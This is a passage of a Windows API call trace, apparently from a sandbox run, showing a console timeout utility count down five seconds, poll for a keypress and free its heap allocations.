(lpString="\nWaiting for %*lu") returned 17 [0186.737] GetProcessHeap () returned 0x720000 [0186.737] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x24) returned 0x723850 [0186.737] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="\nWaiting for %*lu", _ArgList=0xdfa9c | out: _Buffer="\nWaiting for 5") returned 14 [0186.738] __iob_func () returned 0x76b41208 [0186.738] _fileno (_File=0x76b41228) returned 1 [0186.738] _errno () returned 0x5405b0 [0186.738] _get_osfhandle (_FileHandle=1) returned 0x3c [0186.738] _errno () returned 0x5405b0 [0186.738] GetFileType (hFile=0x3c) returned 0x2 [0186.738] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0186.738] GetFileType (hFile=0x3c) returned 0x2 [0186.738] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0186.739] __iob_func () returned 0x76b41208 [0186.739] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0186.739] lstrlenW (lpString="\nWaiting for 5") returned 14 [0186.739] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0xe) returned 1 [0186.741] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0186.741] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3c, lpConsoleScreenBufferInfo=0xdfae8 | out: lpConsoleScreenBufferInfo=0xdfae8) returned 1 [0186.741] GetProcessHeap () returned 0x720000 [0186.741] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c260 [0186.741] _memicmp (_Buf1=0x72d308, _Buf2=0x9910ac, _Size=0x7) returned 0 [0186.741] LoadStringW (in: hInstance=0x0, uID=0xa0, lpBuffer=0x72e3d0, cchBufferMax=256 | out: lpBuffer=" seconds, press a key to continue ...") returned 0x25 [0186.741] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37 [0186.741] GetProcessHeap () returned 0x720000 [0186.741] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x4c) returned 0x726f50 [0186.741] __iob_func () returned 0x76b41208 [0186.742] _fileno (_File=0x76b41228) returned 1 [0186.742] _errno () returned 0x5405b0 [0186.742] _get_osfhandle (_FileHandle=1) returned 0x3c [0186.742] _errno () returned 0x5405b0 [0186.742] GetFileType (hFile=0x3c) returned 0x2 [0186.742] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0186.742] GetFileType (hFile=0x3c) returned 0x2 [0186.742] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0186.742] __iob_func () returned 0x76b41208 [0186.742] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0186.742] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37 [0186.742] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x726f50*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0x726f50*, lpNumberOfCharsWritten=0xdfa98*=0x25) returned 1 [0186.763] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0186.810] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab141 [0186.810] Sleep (dwMilliseconds=0x64) [0186.921] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0187.020] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab142 [0187.020] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x084") returned 2 [0187.020] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0187.025] __iob_func () returned 0x76b41208 [0187.026] _fileno (_File=0x76b41228) returned 1 [0187.026] _errno () returned 0x5405b0 [0187.026] _get_osfhandle (_FileHandle=1) returned 0x3c [0187.026] _errno () returned 0x5405b0 [0187.026] GetFileType (hFile=0x3c) returned 0x2 [0187.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0187.026] GetFileType (hFile=0x3c) returned 0x2 [0187.026] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0187.112] __iob_func () returned 0x76b41208 [0187.112] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0187.112] lstrlenW (lpString="\x084") returned 2 [0187.112] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0187.119] Sleep (dwMilliseconds=0x64) [0187.248] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0187.315] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab142 [0187.315] Sleep (dwMilliseconds=0x64) [0187.436] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0187.441] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab142 [0187.441] Sleep (dwMilliseconds=0x64) [0187.623] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0187.684] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab142 [0187.684] Sleep (dwMilliseconds=0x64) [0187.808] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0187.877] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab142 [0187.877] Sleep (dwMilliseconds=0x64) [0187.982] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0187.985] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab143 [0187.985] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x083") returned 2 [0187.985] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0187.985] __iob_func () returned 0x76b41208 [0187.985] _fileno (_File=0x76b41228) returned 1 [0187.985] _errno () returned 0x5405b0 [0187.985] _get_osfhandle (_FileHandle=1) returned 0x3c [0187.985] _errno () returned 0x5405b0 [0187.985] GetFileType (hFile=0x3c) returned 0x2 [0187.985] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0187.985] GetFileType (hFile=0x3c) returned 0x2 [0187.985] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0187.985] __iob_func () returned 0x76b41208 [0187.985] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0187.985] lstrlenW (lpString="\x083") returned 2 [0187.985] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0187.986] Sleep (dwMilliseconds=0x64) [0188.094] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0188.095] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab143 [0188.096] Sleep (dwMilliseconds=0x64) [0188.206] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0188.208] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab143 [0188.208] Sleep (dwMilliseconds=0x64) [0188.328] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0188.330] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab143 [0188.330] Sleep (dwMilliseconds=0x64) [0188.436] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0188.442] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab143 [0188.442] Sleep (dwMilliseconds=0x64) [0188.562] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0188.644] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab143 [0188.644] Sleep (dwMilliseconds=0x64) [0188.779] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0188.848] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab143 [0188.848] Sleep (dwMilliseconds=0x64) [0188.984] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0189.084] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab144 [0189.084] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x082") returned 2 [0189.084] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0189.124] __iob_func () returned 0x76b41208 [0189.124] _fileno (_File=0x76b41228) returned 1 [0189.125] _errno () returned 0x5405b0 [0189.125] _get_osfhandle (_FileHandle=1) returned 0x3c [0189.125] _errno () returned 0x5405b0 [0189.125] GetFileType (hFile=0x3c) returned 0x2 [0189.125] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0189.125] GetFileType (hFile=0x3c) returned 0x2 [0189.125] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0189.194] __iob_func () returned 0x76b41208 [0189.194] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0189.194] lstrlenW (lpString="\x082") returned 2 [0189.194] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0189.214] Sleep (dwMilliseconds=0x64) [0189.417] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0189.480] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab144 [0189.480] Sleep (dwMilliseconds=0x64) [0189.623] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0189.694] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab144 [0189.694] Sleep (dwMilliseconds=0x64) [0189.843] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0189.846] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab144 [0189.846] Sleep (dwMilliseconds=0x64) [0189.952] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0189.968] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab145 [0189.968] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x081") returned 2 [0189.968] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0189.968] __iob_func () returned 0x76b41208 [0189.968] _fileno (_File=0x76b41228) returned 1 [0189.968] _errno () returned 0x5405b0 [0189.969] _get_osfhandle (_FileHandle=1) returned 0x3c [0189.969] _errno () returned 0x5405b0 [0189.969] GetFileType (hFile=0x3c) returned 0x2 [0189.969] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0189.969] GetFileType (hFile=0x3c) returned 0x2 [0189.969] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0189.969] __iob_func () returned 0x76b41208 [0189.969] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0189.969] lstrlenW (lpString="\x081") returned 2 [0189.969] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0189.969] Sleep (dwMilliseconds=0x64) [0190.200] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0190.226] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab145 [0190.226] Sleep (dwMilliseconds=0x64) [0190.365] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0190.423] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab145 [0190.423] Sleep (dwMilliseconds=0x64) [0190.548] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0190.550] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab145 [0190.550] Sleep (dwMilliseconds=0x64) [0190.655] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0190.676] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab145 [0190.676] Sleep (dwMilliseconds=0x64) [0190.827] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0190.829] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab145 [0190.829] Sleep (dwMilliseconds=0x64) [0190.952] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0191.109] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab146 [0191.109] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x080") returned 2 [0191.109] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0191.159] __iob_func () returned 0x76b41208 [0191.161] _fileno (_File=0x76b41228) returned 1 [0191.161] _errno () returned 0x5405b0 [0191.161] _get_osfhandle (_FileHandle=1) returned 0x3c [0191.162] _errno () returned 0x5405b0 [0191.162] GetFileType (hFile=0x3c) returned 0x2 [0191.162] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0191.162] GetFileType (hFile=0x3c) returned 0x2 [0191.162] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0191.162] __iob_func () returned 0x76b41208 [0191.162] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0191.162] lstrlenW (lpString="\x080") returned 2 [0191.162] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0191.163] Sleep (dwMilliseconds=0x64) [0191.297] __iob_func () returned 0x76b41208 [0191.297] _fileno (_File=0x76b41228) returned 1 [0191.297] _errno () returned 0x5405b0 [0191.297] _get_osfhandle (_FileHandle=1) returned 0x3c [0191.298] _errno () returned 0x5405b0 [0191.298] GetFileType (hFile=0x3c) returned 0x2 [0191.298] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0191.298] GetFileType (hFile=0x3c) returned 0x2 [0191.298] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0191.301] __iob_func () returned 0x76b41208 [0191.301] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0191.301] lstrlenW (lpString="\n") returned 1 [0191.302] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x99106c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0x99106c*, lpNumberOfCharsWritten=0xdfa98*=0x1) returned 1 [0191.303] GetProcessHeap () returned 0x720000 [0191.303] GetProcessHeap () returned 0x720000 [0191.303] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72d540) returned 1 [0191.303] GetProcessHeap () returned 0x720000 [0191.303] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72d540) returned 0xa0 [0191.304] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72d540 | out: hHeap=0x720000) returned 1 [0191.305] GetProcessHeap () returned 0x720000 [0191.305] GetProcessHeap () returned 0x720000 [0191.305] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72d2f0) returned 1 [0191.305] GetProcessHeap () returned 0x720000 [0191.305] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72d2f0) returned 0x10 [0191.305] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72d2f0 | out: hHeap=0x720000) returned 1 [0191.305] GetProcessHeap () returned 0x720000 [0191.305] GetProcessHeap () returned 0x720000 [0191.305] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c1a0) returned 1 [0191.305] GetProcessHeap () returned 0x720000 [0191.305] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c1a0) returned 0x14 [0191.305] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c1a0 | out: hHeap=0x720000) returned 1 [0191.306] GetProcessHeap () returned 0x720000 [0191.306] GetProcessHeap () returned 0x720000 [0191.306] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x7279e8) returned 1 [0191.306] GetProcessHeap () returned 0x720000 [0191.306] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7279e8) returned 0x4 [0191.306] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7279e8 | out: hHeap=0x720000) returned 1 [0191.306] GetProcessHeap () returned 0x720000 [0191.306] GetProcessHeap () returned 0x720000 [0191.306] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72d350) returned 1 [0191.306] GetProcessHeap () returned 0x720000 [0191.306] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72d350) returned 0x10 [0191.307] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72d350 | out: hHeap=0x720000) returned 1 [0191.307] GetProcessHeap () returned 0x720000 [0191.307] GetProcessHeap () returned 0x720000 [0191.307] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c240) returned 1 [0191.307] GetProcessHeap () returned 0x720000 [0191.308] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c240) returned 0x14 [0191.308] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c240 | out: hHeap=0x720000) returned 1 [0191.308] GetProcessHeap () returned 0x720000 [0191.308] GetProcessHeap () returned 0x720000 [0191.308] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c500) returned 1 [0191.308] GetProcessHeap () returned 0x720000 [0191.308] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c500) returned 0x208 [0191.315] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c500 | out: hHeap=0x720000) returned 1 [0191.316] GetProcessHeap () returned 0x720000 [0191.316] GetProcessHeap () returned 0x720000 [0191.316] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x7273d0) returned 1 [0191.316] GetProcessHeap () returned 0x720000 [0191.316] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7273d0) returned 0x10 [0191.316] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7273d0 | out: hHeap=0x720000) returned 1 [0191.316] GetProcessHeap () returned 0x720000 [0191.316] GetProcessHeap () returned 0x720000 [0191.316] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c440) returned 1 [0191.316] GetProcessHeap () returned 0x720000 [0191.317] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c440) returned 0x14 [0191.317] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c440 | out: hHeap=0x720000) returned 1 [0191.317] GetProcessHeap () returned 0x720000 [0191.317] GetProcessHeap () returned 0x720000 [0191.317] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72e3d0) returned 1 [0191.317] GetProcessHeap () returned 0x720000 [0191.317] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72e3d0) returned 0x200 [0191.318] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72e3d0 | out: hHeap=0x720000) returned 1 [0191.318] GetProcessHeap () returned 0x720000 [0191.318] GetProcessHeap () returned 0x720000 [0191.318] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72d308) returned 1 [0191.318] GetProcessHeap () returned 0x720000 [0191.319] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72d308) returned 0x10 [0191.319] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72d308 | out: hHeap=0x720000) returned 1 [0191.319] GetProcessHeap () returned 0x720000 [0191.319] GetProcessHeap () returned 0x720000 [0191.319] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c4e0) returned 1 [0191.319] GetProcessHeap () returned 0x720000 [0191.319] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c4e0) returned 0x14 [0191.319] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c4e0 | out: hHeap=0x720000) returned 1 [0191.319] GetProcessHeap () returned 0x720000 [0191.319] GetProcessHeap () returned 0x720000 [0191.320] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72d3b0) returned 1 [0191.320] GetProcessHeap () returned 0x720000 [0191.320] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72d3b0) returned 0xa [0191.320] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72d3b0 | out: hHeap=0x720000) returned 1 [0191.320] GetProcessHeap () returned 0x720000 [0191.320] GetProcessHeap () returned 0x720000 [0191.320] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72d320) returned 1 [0191.320] GetProcessHeap () returned 0x720000 [0191.320] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72d320) returned 0x10 [0191.320] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72d320 | out: hHeap=0x720000) returned 1 [0191.320] GetProcessHeap () returned 0x720000 [0191.320] GetProcessHeap () returned 0x720000 [0191.320] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c1c0) returned 1 [0191.321] GetProcessHeap () returned 0x720000 [0191.321] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c1c0) returned 0x14 [0191.321] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c1c0 | out: hHeap=0x720000) returned 1 [0191.321] GetProcessHeap () returned 0x720000 [0191.321] GetProcessHeap () returned 0x720000 [0191.321] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72d380) returned 1 [0191.321] GetProcessHeap () returned 0x720000 [0191.321] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72d380) returned 0xa [0191.321] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72d380 | out: hHeap=0x720000) returned 1 [0191.321] GetProcessHeap () returned 0x720000 [0191.321] GetProcessHeap () returned 0x720000 [0191.321] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72d338) returned 1 [0191.321] GetProcessHeap () returned 0x720000 [0191.322] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72d338) returned 0x10 [0191.322] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72d338 | out: hHeap=0x720000) returned 1 [0191.322] GetProcessHeap () returned 0x720000 [0191.322] GetProcessHeap () returned 0x720000 [0191.322] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c280) returned 1 [0191.322] GetProcessHeap () returned 0x720000 [0191.322] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c280) returned 0x14 [0191.322] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c280 | out: hHeap=0x720000) returned 1 [0191.322] GetProcessHeap () returned 0x720000 [0191.322] GetProcessHeap () returned 0x720000 [0191.322] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x726c38) returned 1 [0191.322] GetProcessHeap () returned 0x720000 [0191.328] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x726c38) returned 0x2 [0191.328] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x726c38 | out: hHeap=0x720000) returned 1 [0191.328] GetProcessHeap () returned 0x720000 [0191.328] GetProcessHeap () returned 0x720000 [0191.328] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x728818) returned 1 [0191.328] GetProcessHeap () returned 0x720000 [0191.329] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x728818) returned 0x14 [0191.329] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x728818 | out: hHeap=0x720000) returned 1 [0191.329] GetProcessHeap () returned 0x720000 [0191.329] GetProcessHeap () returned 0x720000 [0191.329] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x727100) returned 1 [0191.329] GetProcessHeap () returned 0x720000 [0191.329] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x727100) returned 0x14 [0191.329] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x727100 | out: hHeap=0x720000) returned 1 [0191.329] GetProcessHeap () returned 0x720000 [0191.329] GetProcessHeap () returned 0x720000 [0191.329] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x727310) returned 1 [0191.329] GetProcessHeap () returned 0x720000 [0191.330] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x727310) returned 0x14 [0191.330] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x727310 | out: hHeap=0x720000) returned 1 